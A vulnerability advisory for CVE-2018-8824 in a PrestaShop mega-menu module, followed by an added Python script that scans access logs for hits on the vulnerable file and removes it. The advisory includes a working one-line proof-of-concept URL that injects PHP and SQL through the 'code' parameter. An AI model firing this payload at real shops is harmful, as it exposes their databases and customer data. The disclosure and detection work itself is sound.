IA Informática Valencia

PrestaShop SQL Injection

CVE Ref: CVE-2018-8824
Release Date: 2018/03/06
Discover Credits: Andrea Iodice
Bulletin Author:  IA - Informática Avanzada
Contact: andrea@ia-informatica.com
Type: SQL Injection
Level: High
Vulnerable Application: PrestaShop ( -

Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro
is a module on the PrestaShop Addons Marketplace that contains multiple vulnerabilities.

File: /modules/bamegamenu/ajax_phpcode.php
Vulnerable Argument(s): $_POST['code'] or $_GET['code']

Proof of Concept:
GET: http://site/modules/bamegamenu/ajax_phpcode.php?code=p(Db::getInstance()->ExecuteS("show tables"));

modules/bamegamenu/ajax_phpcode.php in the Responsive Mega Menu (Horizontal+Vertical+Dropdown) Pro module 1.0.32 for PrestaShop through allows remote attackers to perform SQL injection through PHP code via the code parameter.

Delete or edit the vulnerable file.
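The following is an added defender-side example; it is not part of this bulletin or of the module's own code. It covers both points above: spotting requests to the vulnerable script in a web server access log (GET requests carrying the code parameter, and POST requests, whose bodies are not logged), and checking a shop root for the presence of modules/bamegamenu/ajax_phpcode.php and applying the fix of deleting it. It assumes the "combined" access-log format; the log lines, IP addresses and the throwaway shop directory are constructed for the demonstration.

```python
"""Defender-side checks for CVE-2018-8824 (Responsive Mega Menu module for
PrestaShop). Added example, not part of the advisory or the module's code.
Assumptions: the web server writes a "combined" format access log and the
shop lives under one root directory; all sample data below is constructed."""
import os
import re
import tempfile
from urllib.parse import parse_qs, urlsplit

VULN_PATH = "modules/bamegamenu/ajax_phpcode.php"  # file named in the advisory
VULN_PARAM = "code"                                  # parameter named in the advisory

# Fields of a "combined" access-log line that we need: client IP, timestamp,
# method, request target and HTTP status. Lines that do not match are skipped.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: two requests to the vulnerable script from one
# client, two ordinary shop requests from another (benign placeholder payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Mar/2018:10:15:01 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=p(1) HTTP/1.1" 200 512 "-" "curl/7.58.0"',
    '203.0.113.7 - - [06/Mar/2018:10:15:05 +0100] "POST /modules/bamegamenu/ajax_phpcode.php HTTP/1.1" 200 2048 "-" "curl/7.58.0"',
    '198.51.100.4 - - [06/Mar/2018:10:16:00 +0100] "GET /modules/bamegamenu/views/css/front.css HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Mar/2018:10:16:02 +0100] "GET /index.php?id_product=12&controller=product HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def targets_vulnerable_script(target: str) -> bool:
    """True when the request path is the module's ajax_phpcode.php
    (also matches shops installed in a sub-directory)."""
    return urlsplit(target).path.endswith("/" + VULN_PATH)


def has_code_parameter(target: str) -> bool:
    """True when the query string carries the 'code' parameter (GET vector)."""
    return VULN_PARAM in parse_qs(urlsplit(target).query, keep_blank_values=True)


def scan_access_log(lines):
    """Return one record per request that reaches the vulnerable script.

    GET requests are flagged only when 'code' is in the query string. POST
    bodies are not written to access logs, so every POST to the script is
    flagged for manual review."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m or not targets_vulnerable_script(m["target"]):
            continue
        if m["method"] == "POST" or has_code_parameter(m["target"]):
            hits.append({"ip": m["ip"], "timestamp": m["ts"],
                         "method": m["method"], "status": m["status"]})
    return hits


def check_install(shop_root: str) -> dict:
    """Report whether the vulnerable file exists under a PrestaShop root."""
    path = os.path.join(shop_root, VULN_PATH)
    return {"path": path, "present": os.path.isfile(path)}


def remove_vulnerable_file(shop_root: str) -> bool:
    """Apply the advisory's fix (delete the file). Returns True if removed."""
    path = os.path.join(shop_root, VULN_PATH)
    if not os.path.isfile(path):
        return False
    os.remove(path)
    return True


def build_demo_install() -> str:
    """Create a throwaway directory that mimics a shop with the module
    installed (constructed fixture for demonstration and testing only)."""
    root = tempfile.mkdtemp(prefix="ps_demo_")
    os.makedirs(os.path.join(root, "modules", "bamegamenu"))
    with open(os.path.join(root, VULN_PATH), "w") as fh:
        fh.write("<?php /* placeholder standing in for the module file */\n")
    return root


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", hit)
    demo_root = build_demo_install()
    print("before fix:", check_install(demo_root))
    remove_vulnerable_file(demo_root)
    print("after fix: ", check_install(demo_root))
```

Point scan_access_log at the real access log (one line per call to readlines) to find past hits, and run check_install against the shop's document root to confirm the file is gone after the module is updated or the file removed. The path check uses endswith so that shops served from a sub-directory are covered as well.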
